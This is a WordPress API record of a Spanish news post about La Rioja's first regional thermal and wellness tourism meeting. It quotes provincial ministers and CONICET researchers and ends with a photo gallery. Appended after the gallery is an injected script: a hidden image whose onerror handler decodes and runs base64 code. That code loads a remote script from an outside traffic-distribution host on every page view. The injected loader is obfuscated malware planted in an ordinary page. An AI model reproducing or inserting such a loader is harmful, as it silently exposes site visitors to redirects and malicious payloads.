{"id":5357,"date":"2022-06-08T20:39:08","date_gmt":"2022-06-08T23:39:08","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5357"},"modified":"2025-08-13T16:18:58","modified_gmt":"2025-08-13T19:18:58","slug":"el-gobierno-de-la-rioja-realizara-el-encuentro-regional-de-termalismo-y-turismo-de-bienestar","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5357","title":{"rendered":"El Gobierno de la Rioja, realizar\u00e1 el Encuentro Regional de Termalismo y Turismo de Bienestar"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large is-style-default\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-1024x72.jpeg\" alt=\"\" class=\"wp-image-5316\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption><strong><em><span style=\"background-color:#ffffff\" class=\"tadv-background-color\"><span style=\"color:#abb8c3\" class=\"tadv-color\"><sub>Publicidad<\/sub><\/span><\/span><\/em><\/strong><\/figcaption><\/figure>\n\n\n\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#021c2c\">El Gobierno de la Provincia, a trav\u00e9s del Ministerio de Turismo y Culturas realizar\u00e1 el pr\u00f3ximo viernes por la ma\u00f1ana el primer Encuentro Regional de Termalismo y Turismo de Bienestar, que tendr\u00e1 importantes disertantes de la ciencia y el desarrollo del pa\u00eds y el mundo, buscando que La Rioja se transforme en uno de los destinos termales m\u00e1s importantes.<\/h5>\n\n\n\n<p>En ese contexto el secretario general de la Gobernaci\u00f3n, Armando Molina expuso que, \u201cPan, Techo y Trabajo es uno de los objetivos pol\u00edticos de nuestra gesti\u00f3n, con una impronta filos\u00f3fica que dice Riojanidad, Transformaci\u00f3n y Consenso Social. La Rioja desanda un camino en sus 431 a\u00f1os de fundaci\u00f3n, y hoy suena una campa\u00f1a que es de un gran atractor como es el turismo, un tutor poco dinamizador de la econom\u00eda provincial, pero de gran expectativa que sea un tutor de desarrollo econ\u00f3mico de La Rioja\u201d.<\/p>\n\n\n\n<p>\u201cEl termalismo era algo desconocido, pero hay 15 manifestaciones de aguas termales en la Provincia\u201d, asumi\u00f3, y agreg\u00f3 que, \u201ces una gran posibilidad en este plan de transformaci\u00f3n y consenso social\u201d.<\/p>\n\n\n\n<p>\u201cVenimos a redoblar la apuesta de esta Rioja que desanda en estos t\u00f3rridos veranos y fr\u00edos inviernos. Esta tranquilidad provinciana puede ser alterada por esta decisi\u00f3n de adoptar el turismo, como una gran posibilidad\u201d, afirm\u00f3 asimismo.<\/p>\n\n\n\n<p>El ministro de Turismo y Culturas, Gustavo Luna coment\u00f3 por su parte que el encuentro tendr\u00e1 importantes disertantes del CONICET y tambi\u00e9n de la cartera que dirige. \u201cLa Rioja presenta por primera vez para el pa\u00eds y el mundo, una propuesta de desarrollo de uno de los productos tur\u00edstico m\u00e1s importantes a nivel mundial y en Argentina, las provincias que participar\u00e1n del encuentro regional con aristas internacionales\u201d, expres\u00f3.<\/p>\n\n\n\n<p>\u201cEl termalismo en el mundo genera puestos de trabajo de calidad y en gran cantidad, hasta hace poco se consideraba un turismo para adultos mayores, hasta que los grandes desarrolladores lo plantearon como turismo de bienestar, de familia, en Argentina Rosario de las Fronteras, Termas de R\u00edo Hondo, y todos esos destinos\u201d, sostuvo.<\/p>\n\n\n\n<p>El encuentro tendr\u00e1 la participaci\u00f3n de Termatalia, una organizaci\u00f3n p\u00fablico-privada, del Norte de Espa\u00f1a cuyo presidente estar\u00e1 el viernes pr\u00f3ximo dejando inaugurado oficialmente el encuentro, y La Rioja se pondr\u00e1 en la b\u00fasqueda, en el paso fundacional del destino termal.<\/p>\n\n\n\n<p>Luna remarc\u00f3 que, \u201cen un estudio que se hizo hace algunos a\u00f1os, certifica que La Rioja tiene m\u00e1s de 15 manifestaciones termales, lo que habla a las claras de lo que representa para la Provincia y la visi\u00f3n del gobernador de generar m\u00e1s puestos de trabajo y el desarrollo de los j\u00f3venes en sus lugares de nacimiento\u201d.<\/p>\n\n\n\n<p>\u201cTenemos una asignatura pendiente, la de generar trabajo a partir de ah\u00ed, y se nos ocurri\u00f3 ganar ese espacio con la presencia del gobernador Quintela, y el acompa\u00f1amiento de las provincias con gran desarrollo, y considerando al Norte Grande como desarrollo compacto. Generosamente desde Santiago y Salta nos van a acompa\u00f1ar, por eso le quisimos dar la jerarqu\u00eda que todo requiere\u201d, argument\u00f3.<\/p>\n\n\n\n<p>Coment\u00f3 por otro lado que mantuvo reuniones con el Gobernador Quintela, sobre el desarrollo de los balnearios termales, y \u201cla idea es que los primeros desarrollos sean con acceso p\u00fablico, y un gran est\u00edmulo de inversi\u00f3n privada, trabajando con diputados y comisi\u00f3n de Tierras, para el saneamiento, pieza clave para conseguir recursos. El CONICET certificar\u00e1 la calidad del agua, mientras que el Parque E\u00f3lico Arauco suma toda su capacidad en recursos humanos y t\u00e9cnicos para el desarrollo de este proyecto\u201d.<\/p>\n\n\n\n<p><img decoding=\"async\" height=\"16\" width=\"16\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/td2\/2\/16\/2714.png\" alt=\"\u2714\"> <strong>Alternativa terap\u00e9utica<\/strong><\/p>\n\n\n\n<p>En ese mismo marco, el ministro de Salud Juan Carlos Vergara dijo que, \u201cesta es una excelente noticia para la Provincia, m\u00e1s all\u00e1 del turismo, del desarrollo y una nueva oferta, para la salud porque tenemos en la Provincia. Va a servir como alternativa terap\u00e9utica para personas con enfermedades cr\u00f3nicas, y necesitamos ampliar la capacidad de dar respuesta a estos pacientes\u201d.<\/p>\n\n\n\n<p>\u201cVa a ser muy importante para nuestros pacientes como alternativa de tratamiento en nuestra Provincia, sabiendo que no tenemos todo este desarrollo para dar el paso inicial y tomar conciencia que aqu\u00ed, a muy pocos kil\u00f3metros tendremos estos lugares\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>El secretario de Turismo, Jos\u00e9 Rosa sum\u00f3 que, \u201cesto tendr\u00e1 una diversidad de ofertas muy grandes, y nuestros lugares, nos dar\u00e1 la posibilidad de armar diferentes desarrollos y productos, buscando que el riojano sea quien tenga acceso, y siendo nosotros los promotores de nuestras bellezas\u201d.<\/p>\n\n\n\n<p>\u201cEste es el puntapi\u00e9 inicial de un gran desarrollo que tendr\u00e1 la Provincia, estando a las claras que La Rioja tiene un gran futuro con este producto\u201d, asever\u00f3.<\/p>\n\n\n\n<p>Pablo Alasino referente de estudios termales en La Rioja del CONICET indic\u00f3 a su turno que, \u201cdesde el lado de la ciencia estamos contentos por el crecimiento tur\u00edstico termal en La Rioja, que ser\u00e1 un turismo activo todo el a\u00f1o que se puede disfrutar en todas las \u00e9pocas\u201d.<\/p>\n\n\n\n<p>\u201cOfreceremos un conocimiento cient\u00edfico tratando que el turismo no solo venga, sino que tenga conocimiento de c\u00f3mo se gener\u00f3 el agua termal, las caracter\u00edsticas del agua y la cantidad y el caudal de agua que tenemos para poder estar acorde a este emprendimiento tur\u00edsticio\u201d, cont\u00f3 sobre el trabajo del CONICET y la UNLaR.<\/p>\n\n\n\n<p>Por \u00faltimo, la Directora de Innovaci\u00f3n, Capacitaci\u00f3n y Desarrollado del Ministerio de Turismo Julieta Barrionuevo inform\u00f3 que las inscripciones al encuentro ser\u00e1n online a trav\u00e9s de encuentro.turismotermal.larioja@gmail.com o a trav\u00e9s del Instagram del Ministerio de Turismo y Culturas, y en tanto, el jueves y viernes habr\u00e1 acreditaciones en el sal\u00f3n Coty Agost Carre\u00f1o del Paseo Cultural Castro Barros.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.facebook.com\/MinTurismoyCulturasLaRioja\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/scontent.fsla1-1.fna.fbcdn.net\/v\/t39.30808-6\/221486361_354960369337204_8291499025510155495_n.jpg?_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=09cbfe&amp;_nc_eui2=AeFBJsnRaETXUMFzLlFjRhN4l2uhvSjz2g-Xa6G9KPPaD5HoSlYCIX_M7S97G05Vvtl59veX9TPZ-eqAXKOkaVGD&amp;_nc_ohc=FDLT5tiYRHsAX-AUxmE&amp;_nc_ht=scontent.fsla1-1.fna&amp;oh=00_AT-8z_bUCIVn8AYz7JeJ9XrWHJc9HXSLsLsJAHsuIeZ6TA&amp;oe=62A5F785\" alt=\"\" width=\"136\" height=\"136\" \/><\/a><figcaption>Fuente:<\/figcaption><\/figure>\n\n\n\n<p>Galer\u00eda de im\u00e1genes:<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-4 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"5359\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-1024x683.jpg\" alt=\"\" class=\"wp-image-5359\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286745311_348469940734099_6027790690861945404_n.jpg 1392w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"5360\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-1024x683.jpg\" alt=\"\" class=\"wp-image-5360\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286803704_348469850734108_9203341831834518426_n.jpg 1392w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"5358\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-1024x683.jpg\" alt=\"\" class=\"wp-image-5358\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286812972_348469840734109_6891551051823311524_n-1.jpg 1392w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"5361\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-1024x683.jpg\" alt=\"\" class=\"wp-image-5361\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/286389334_348469950734098_6055222429428758104_n.jpg 1392w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Gobierno de la Provincia, a trav\u00e9s del Ministerio de Turismo y Culturas realizar\u00e1 el pr\u00f3ximo viernes por la ma\u00f1ana el primer Encuentro Regional de Termalismo y Turismo de Bienestar, que tendr\u00e1 importantes disertantes de la ciencia y el desarrollo del pa\u00eds y el mundo, buscando que La Rioja se transforme en uno de los [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5359,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,29,17],"tags":[],"class_list":["post-5357","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cuyo","category-datos-utiles","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5357","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5357"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5357\/revisions"}],"predecessor-version":[{"id":10660,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5357\/revisions\/10660"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5359"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5357"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5357"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5357"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}